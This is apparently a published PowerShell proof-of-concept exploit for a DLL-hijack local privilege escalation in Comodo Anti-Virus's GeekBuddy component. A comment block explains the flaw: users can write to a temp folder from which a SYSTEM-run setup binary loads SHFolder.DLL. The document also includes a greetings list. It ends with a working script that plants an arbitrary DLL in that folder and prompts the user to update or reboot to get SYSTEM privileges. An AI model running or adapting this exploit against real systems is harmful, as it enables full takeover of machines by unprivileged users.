<#
````......````
``,;''''''''''''''''';,`
.;''''''''''''''''''''''''''',`
`:''''''''+';:,.``````.,:;'''''''''':`
,;'''''';,.` ``,;'''''';:
`:'''''',. `,'''''';.
`;+''+':` ,; `,''''';.
`;'''';. `` .:;'` `. `;'''''.
` :+''';` `,``:+'' ';;'`,''; `` `` :'''';`
.'''';` ,';' '':'` ';,'`'',' :''' .''` :'''',
`;''''` ;'' :+.` ;';, ';:' ''''`,;:+ '', `;''''`
.''''. ;:`, .'.':`'''.:;`;. +;:' '::; ;''' '; .'''',
:''';` ` '''',`':'' ..;:`','` '''' ':;;`'`';`':` :; :''';
;''+, .;`.'.'' ';.'`';': ,:. ` ` ` `,: .';',,'`;'.`';': .+'''`
`''''` ;'; ''.'.,','` ,` ``;`'' .`;'`''+: ;'''`
`'''' ., .'' ,'.'' ;;. ```````` `. ``'::'`;; ` :'''.
``''': `+,` .':`'',' `,;''''''''''+'':.` ;'.+:;'``': .'''.
`''', '', ''`:; `:'''''''''''''''''''''';. `;'`': ''`'` .''',
`''', ` `''` `'; .''''''''''''''''''''''''''''';` `.;' ;'.''`.: `''',
`''', :''.`'' ` ,;'''''''''''''''''''''''''''''''';. ` `,.'::', ''` .'''.
''', '.''`,': ,'''''''''''''''''''''''''''''''''''''', ` .+,'; ''; .'''`
''': ''`'' ;. `'''''''''''''''''';:::;';'''''''''''''''''. ;' :': ,,` .'''
:''; `''.'` ` :''''''''''''';:::.', `''';`:;'+'''','''''+; `,'; :''' ,'''
.''' `` .++; `''''''''''''`. `': '''; `:''' :'''''''. .+ :''.+. :'':
`''+ :'': `` ,''''''''''''' `': '''; `: ,'''''''': .`''.'' ` '''`
;''. `+.',; ;'''':''''''''; ` ', .'''': ` :''''';'''; `'.',`,', `+''
,'': '';,'. ;''''':''''''''`+` ;..`;'+''. '.:''''';'''''```.+' +:'` .'';
`''' `;``+',;.` ;''''':''''''''.'; `;'', '` '' ;''''','''''` ;,+.+. ;''.
;'+. :'': ;': ;'''''':''''':',''. `'';.+' '` ,'; .'''';''''''` `+.':` `'''
`'': .+`;''` ` ;'''''':''''''.::''. .''. :: `'';`,'''':''''''` :+'. ,'',
'''` :''.:'' :''''''':'''''; :'''' .'', `.,; :+'`''': ;''',''''''' ,` '''
.'': `'';`` ,''''''':;''''':`''';', ,''+` ,+':' +'''''''`,'''''''''''; .+` .'':
''' `''. :', `''''''':`'''''+.;';.:::::::,,''';`'': . .'''''''; ''''.''''''', ` ;'': '''
.'', ','';`. '''''''; :'''''' `,;'''''''''.``` . ''''';:,`:;''+`'''',,'''''''` :'';` `+':
'''` ''.,'; ;''''''; ''''',`,'''''''''''''.....,,,.`''''''''';;,,;.''''; :''''''' '''. ;''
`'': .'';:; `'''''''` .+'', ,''''''''''''; '''''''++`''''':..:'''' `''''' ;'''''', ., `` .'',
` :'' :''` ''''''+` ;''``;'''''''''''''':``,,.`````,'''''. ';.;'''` `'''''''` .++. '';
+'' ,'''''': ;+`,'''''''''''''''''+''';;;;'''''''+` :;+,`''. `.''''''; .+'''` :'+`
,''. ': +'''''; ,,;''''''''''''''''''''''''''''''''''. `.::,` `';.', ;''''''` :'': `. `'';
;'' :;.;': ,''''''. `''''';;;,`.:'''''''''''''''''''''''''.;''''''':`;;;, `''''''; `.; .;'+` ;''
'': ` ;';';' ''''''; ''';;''''''',`.'',` .:;;''''''''''.,'''''''''''.;;. ,'''''' `;''''. .''`
.''. .';`;' .''''''. :+;;''''''''''': ;' ::::...;''+'':,'''';..``;''';. ''''''; `:''.`': `'':
:'' ` ,'` ;''''''. :;'''''''''''''';`;, `,''';` .:;;;'''': ,'''''' .,''', '''
;'; ''';,` `''''''''''` :''''''''''';.:'''`';:` ,''';`;''''''''''', ''''''. ;';,` :''`
`'', .;,'''; ,'''''''''' ;'''''''''':` :'''`::` ``'''',+''''''''''''+` ;'''''; .``.:;` `''.
.''` `+;'`;` '''''''''';.'''''''',` ''';` :''';'''';::;'''''';; ` `''''''` ;'';;; `+':
:'' ..;'' `''''''''''`'''''''', .'''` `+''';''. ,'''''''''''''''''''''''''''''''''''''':`
;'' :. `` .'''''''''';'''''''' ;''; ;''':::` :'''''''''''''''''''''''''''''''''''''''',
;': '''':` :'''''''''''''''''',` .''' ''''. `+'''''''''''''''''''''''''''''''''''''''''
'', :,;'': ;''''''''''''''''''` ;''... :''''` :''''''''''''''''''''''''''''''''''''''''''`
`''. `+'':,` ''''''''''''''''''; ,'';.+` . ,;''' `'''''''''''''''''''''''''''''''''''''''''';
.''. `.,;'; '''''''''';''''''', ''',+. `` .' .''' ''''''''+'''''''''''''''''''''''''''''''''',
.'+` ;''''' `` '''''''` `;''''.'++','`+.''' ''''''; `;+''''''
,'' ''''';; ,'''';'''';'``.''' :''''''` .'''''':
:'+ '''''': .'''';'''';'` .''' ,''''''` ,''''';
:'' ,''''', ''''''` .'''';'''';', .'''` .''''''` ''''''
;'' `''''''; :''''', '''''' .'''';'''';':,''''. .''''''` ''''''
;'' `';''''' :''''', :''''; :''''''''';''.''''' `''''''` ;'''''
;'' :''''', ,''''' `+''''''''':''.'''''` ,'''''; ''''''
:'+ ,''''', `'''''. ,'''''''''':''::''''; ;''''': `''''''
:'' ```. ,''''': ''''': `''''''''''',''+`'''''. `''''''. :''''''
,''` `''''''' .'''''; `''''': '''''''''''';''',,''''', ''''''' ,'''''',
.''` `''':,.; `'''''' `'''''': '''''''''''''';'''`'''''':. `,''''''', .''''''''
`''` `,;;;''` '''''' `'','''';,` `,''''''''''''''',''':.''''''''''''''''''':` ;'''''''''''''''''''''''''''''',
'', `+';;, '''''' `''`,'''''''''''''''''''''''''''':''''.:''''''''''''''''',+ '''''''''''''''''''''''''''''';
'': ` `,. ;'''''. `''' .''''''''''''''''''''''''''''.''''`;''''''''''''''':;; `''''''''''''''''''''''''''';';
;'; ,''''; :''''': `''''``'''''''''''''''''''''''''''`:''''`;''''''''''''';,', ,'''''''''''''''''''''''''''';
;'' ';;,.. .'''''' `''';; :''''''''''''''''';'''''''. '''''`;'''''''''''';+'` ;'''''''''''''''''''''''''';.
:'' `,:;''' ''''''` `'''`';` `;'''''';,''''''';''''''', .'''''..''''''''''''+: '''''''';''''''''';''''';,`
.''. .''',` ;''''': ` ''':;''. ````` :+'''''',;''''''', '''''';..;''''''''''` `'''''' `,'': `+':
'': ` .;. ,'''''+ .'';,'''''''';:''''''''','''''''': ;'''''''''.`,''''''' ;'''''; ,'', .''.
''; :+.++` `''''''. +'''`'''''''''''''''''''.''''''''', .''';;'':,,'''''''', ''''''. ':''', :''`
:'' ,';:.'. ;'''''' ''''.:''''''''''''''''';;'''''''''''.'''. `:;'''''':'': :'''''' ';,.:' '''
.''. .;:''' .''''''` ,'''':`''''''''''''''''':''''''''''';''''.`;'''''''''.'''', '''''': ,'''', `'':
''; ;';, ;` '''''';.+''''' ''''''''''''''''':''''''''''': :'':'''''''''',;''''': :'''';' ,. .;: ,''`
;'' `;', `,'''''''''''''.,'''''''''''''';','''';:.`` `,.;'''''''''''.+''''''.''''''; ,'+'. '''
.''. '''';` ''''';''''''';`'''''''''''''':.'';:,;'''':` ,:`:''''''''','',`:''':''''''` '.:''' `'':
''' :'': `:. ,'''';;'''''''`;'''''''''''',:';`:'',,``.:'. `':`+''''''';:'',':';.''''''; `'''..' :''
:''` `,. ;:++` ''''';,'''''';`''''''''''';;',.''....,.. ,';:.'.`'''''''.'''','';+'''''' ;. ,+''` '';
`'': `'',`;: `'''''',''''''.:''''''''''`+.,';:''''''';.:''':'`,''''''`'''':''''''''', :':;` ,' ,'',
;''` `+.''+` ` :'''''','''''' '''''''''' `.'''''''''''''::'''', +'''':,''''`;'''''''' +.''+; '''
`'': ;'';` ` ''''''':''''';`'''''''', '''''''''''''''.,''''`''''',:''''`,'''''''` '''.:'; .'':
''+` ,` ,+: `'''''','''''':`'''''''` :'''''''''''''; ;'''`+''''`;'''':+''''''.` ` :'':;, '''
.'': ;';''. .'''''';'''''',`'''''+ ''''''''''''''` .,'';.''''' '''''''''''': +'``;'; .'',
''+` :''; ,'` :''''','''''''.,''''' ,'''''''''''''' :''''';''''','''';''''''; ,.''. .`` '''
`';; `+. ;'':' :''''':'''''''.:'''; ;''''''''''''': `'''''''''''.'''''.'''''' :';`''; :''.
:'',` `'':.''` ;'''';;:''''''`'''; '''''''''''''': .'''''''''''.''',;'''''' ` :''.'''` `'''
''' ;'.:''` ;''''';:''''':''';.'';''''''''''': ,'''''''''':;'':+''''''` .''``'+',: '''`
.';; `;;'; ` :''''':'''''';'''`'';''''''''''': ,''''''''''`''';'''''; .,''` :` ,'':
;'', `', `'. ,''''';''''';'''''':''''''''''': .''''''''',`+';,''''; ``.'''; ``'''
'''` `'';: ` .'''':'''''`'''''';;''''''''''; `'''';'''',.`''+,'', ,'`:'''''` '''`
.''' ;'.'' `;''''''''.''''''':'''';:,''';. ,''';''''',;'''',` `;''''''';. ;'',
,''; ''.;', ,';''''';,''''''`+,` .;:;''',,'';'''+.;''''',```:+,''''''''''.:'';
;''; ''';', '. `,''''''.'''''' `.:;'+''''+''';.,.''':,''''''` ``'''''''''''''',''
''': .,,': :': +''''''',''';.:'+,.` `.:''':`''''''''''; `'':'''''''''''''',`
''': ` .'' `'`;'''''''..,.:+,` ``.,.` ,'''`;'''''''+.';'.:'''':;'''''+:.'`
''': ;:`+'` ,:..,''''''; .+: `:'+''''';` ;'; .''''': `:';:+''';`''''''. .':
`'''; ; ;'. .';'`;'''',;'. .+''''''''''` ;;'+:'''; .+'''''''';''''''.;,'';
`'''' ,'; :'`'`;'''':+` `'''''''''''': ;'';'''`;''''''''''''''''',.''';
`'''' ` ` `':. ';''.+. `''''''''''''; `'''''::'''.'''',`'''''': :';;''
''''. :;,'`:'.';', '''''''''''': ,'''','''..''': '''';;:,''. `''
:''': `.+'' '''',' :''''''''''+. ''''''':`'''' .''';:;`.'.:' ';
,''''` `,` ',;:'. `;;;,``'''::::;''; :';, ,'''''' ;'''` +'''.''+'.:'+`':
`'''': ` ;'':' '''''+;.; `` ,:`''''', `'''''`,'''' :'''.''''..''','.
:''''. .,': :'''''''.`;'''';` .''''''` '''':`+'''``''',;'''``''';:'.
`'''''` `.'` ''''''';`'''''''': ,'''''; ;'''`''''; ''';:'''. ;''',''
,'''''` `.'` '''''''.'''''''''', +'''''` ,'';.''''`''''`+''' ,''''`.:
:''''', .' '''''''.'''';:.,'''`''''''. .''''''':.''',;'''``;,',' '.
`:+'''';..; '''''':,''':'''.:''.'''''': `'`''''' ''''`''': ' ::.:`+
`,''''':' ''''''::''+`''',;''.;''''', `'.'''';`'''.;'''`:.,+`'`,:
.;+':' '''''';.''''';`,'''.''''''` `'.''''.,'''`'''.`;`+;`' +
.:+` '''''''`''''''+'''+.'''''; .' ;''' ;''.;,'' ' ''.:``:
'. :'''''':.+'''''''',;''''', ;: ;''; '''.'.,;,,:'' '`'
;; `'''''''``;'''''',`,''''' `'` ''',.''',.:;`' ''.,.`;
.+ ''''''' ` `.,,.`'; '''; :; `''+`;'';;: :.;`',`; ;`
+: `'''''``';;;;;'''', `` `+. `''' '''::;;:;`;'`;..,
,' ``.. `+''''''''''+` :' `'';`''':. ,.',''.; '
`+' :'''''''''''', `+.` '',.''',. :,''''+ ;
.', ;''''''''''''. ': ''.,''':` ;.''''.,.
:'. :''''''''''', ;'` ''.:''',':;.''':.:
''. ,:''''',` ;+` :'.:'''' ':`''; ;
`'', ''. ::,''''``; :, '
;+;` .'+` ``'':'`,; '``
,'';. `.'';` :';'.,; '.
`,''';:::::;'''. ``+;' +`
`,:''''';,` ,,;
SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @Laughing_Mantis (Greg Linares)
Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC:
###Technical Geeky Stuff###
GeekBuddy stores several helper applications within the C:\ProgramData\Comodo\lps4\temp folder.
These binaries are individual components of the Comodo Security Suite and are executed whenever
their related function is performed, updated, or uninstalled.
The directory listing is as follows:
10/06/2015 12:08 AM <DIR> .
10/06/2015 12:08 AM <DIR> ..
10/02/2015 10:43 PM 27 download.cfg
10/02/2015 10:47 PM 637,864 setup_clps_application_vulnerability_monitor_release-4.10.307677.9.exe
10/02/2015 10:44 PM 2,196,272 setup_clps_autoruns_manager_api_release-4.14.330616.6.exe
10/02/2015 10:44 PM 547,088 setup_clps_boot_time_monitor_release-4.12.315371.9.exe
10/06/2015 12:07 AM 1,014,024 setup_clps_browser_addons_api_release-4.0.292287.4.exe
10/02/2015 10:44 PM 554,240 setup_clps_browser_addons_monitor_release-4.12.315370.6.exe
10/06/2015 12:06 AM 950,864 setup_clps_client_transaction_release-4.19.365037.89.exe
10/06/2015 12:08 AM 563,896 setup_clps_cross_selling_installer_monitor_release-4.12.318569.13.exe
10/02/2015 10:43 PM 768,032 setup_clps_cspm_alert_monitor_release-4.19.360508.5.exe
10/06/2015 12:08 AM 581,432 setup_clps_immaturely_closed_sessions_monitor_release-4.21.366534.6.exe
10/02/2015 10:47 PM 459,432 setup_clps_memory_monitor_release-4.10.301764.3.exe
10/02/2015 10:46 PM 1,152,480 setup_clps_system_cleaner_api_release-4.2.292287.3.exe
10/06/2015 12:07 AM 1,989,272 setup_clps_system_cleaner_monitor_release-4.12.317464.8.exe
10/06/2015 12:07 AM 648,912 setup_clps_windows_event_monitor_release-4.19.362032.8.exe
10/02/2015 10:43 PM 1 survey_version.txt
10/06/2015 12:05 AM <DIR> updates
The C:\ProgramData\Comodo\lps4\temp\ folder has the following permission configuration:
C:\ProgramData\Comodo\lps4\temp NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
BUILTIN\Administrators:(OI)(CI)(ID)F
CREATOR OWNER:(OI)(CI)(IO)(ID)F
BUILTIN\Users:(OI)(CI)(ID)R
BUILTIN\Users:(CI)(ID)(special access:)
FILE_WRITE_DATA
FILE_APPEND_DATA
FILE_WRITE_EA
FILE_WRITE_ATTRIBUTES
Notice how the folder allows Users to have FILE_WRITE_DATA and FILE_WRITE_EA access. This allows
non-administrator users the ability to create files in the directory but not delete or modify
existing files.
Comodo's main service engine is controlled by the SYSTEM service Launcher-Service.exe which resides
in the C:\Program Files (x86)\Common Files\COMODO\ folder. This service is auto launched by the
registry key HKLM\System\CurrentControlSet\Services\CLPSLauncher
This binary will then launch Unit_Manager.exe in the C:\Program Files\COMODO\GeekBuddy with SYSTEM
level privielges. This binary in turn then launches the binary C:\Program Files\COMODO\GeekBuddy\unit.exe
to handle each sub process in the C:\ProgramData\Comodo\lps4\temp\ folder.
During client connections to update servers and Geek Buddy executions the unit.exe binary will
launch the binary setup_clps_client_transaction_release-4.19.365037.89.exe. This setup binary has
hardcoded DLL loading procedures to look for SHFOLDER.DLL in the current directory which it is
executed from.
.data:00409240 dd offset aShfolder ; "SHFOLDER"
.data:00409244 dd offset aShgetfolderpat ; "SHGetFolderPathA"
During this delay load procedure the exe will load SHFOLDER.DLL from its local directory before
looking in the other PATHS variables.
By planting a malicious SHFOLDER.DLL in the C:\ProgramData\Comodo\lps4\temp\ and triggering an
update or client connection to secure servers (which occurs automatically at user login) a user can
elevate their privileges to SYSTEM and compromise the system fully.
######### GREETZ ######################################################################################
1st off all my new homies in the Vectra Networks Research Team - you guys are seriously legit mad #respect to everyone here. #Humbled
@taviso - keep killing it and thanks for being an inspiration
@bill_billbil - sup girl chicken rico n chill
@tacticalRCE - Its no 100 mile rides but will miss all the good times. C-ya around mang.
@hellNBak_ - drop tehm greetz like its 2003
@hacksforpancakes - make plans for other NullCon in 2016 ;)
@jduck - we gonna juke some more toyotas next time you come visit
@hdmoore - good luck with your ventures good sir
@jsoo - dont give up good sir - you're doing awesome
@thegrugq - when i grow up i hope im half as wise as you good sir
@daveaitel - Triangular Anus logos are the best
@da_667 - AYYYYYYYYYYYYYY LMAO
@bonovoxly - Clever Girls Wear Pink on Wednesdays
Derek Soeder - Respect to you brother, keep on being awesome
Benny 29A - next time im in CZ lets get beers, im buying
Yuji Ukai - #RESPECT to everything you have ever done and will ever do. #Ninja
Sizzop - for fixing my greetz
#########################################################################################################
#>
Param
(
[Parameter(ValueFromPipelineByPropertyName = $true)]
[string]$DLL = ""
)
if (!(Test-Path $DLL))
{
throw "Fatal Error: The specified file: $DLL does not exist."
}
Copy-Item -Path $DLL -Destination "C:\ProgramData\Comodo\lps4\temp\SHFolder.dll" -Force
Write-Host "Copying $DLL to the Comodo AV GeekBuddy's insecure temp folder as SHFolder.dll" -ForegroundColor Red
[void][System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
$objNotifyIcon = New-Object System.Windows.Forms.NotifyIcon
$MyPath = Get-Process -id $pid | Select-Object -ExpandProperty Path
$objNotifyIcon.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon($MyPath)
$objNotifyIcon.BalloonTipIcon = "Info"
$objNotifyIcon.BalloonTipText = "Hijacked SHFolder.DLL with $DLL.
Now manually update Comodo Anti-Virus using the GUI or Reboot the system to gain SYSTEM Level Privileges"
$objNotifyIcon.BalloonTipTitle = "@Laughing_Mantis"
$objNotifyIcon.Visible = $True
$objNotifyIcon.ShowBalloonTip(8000)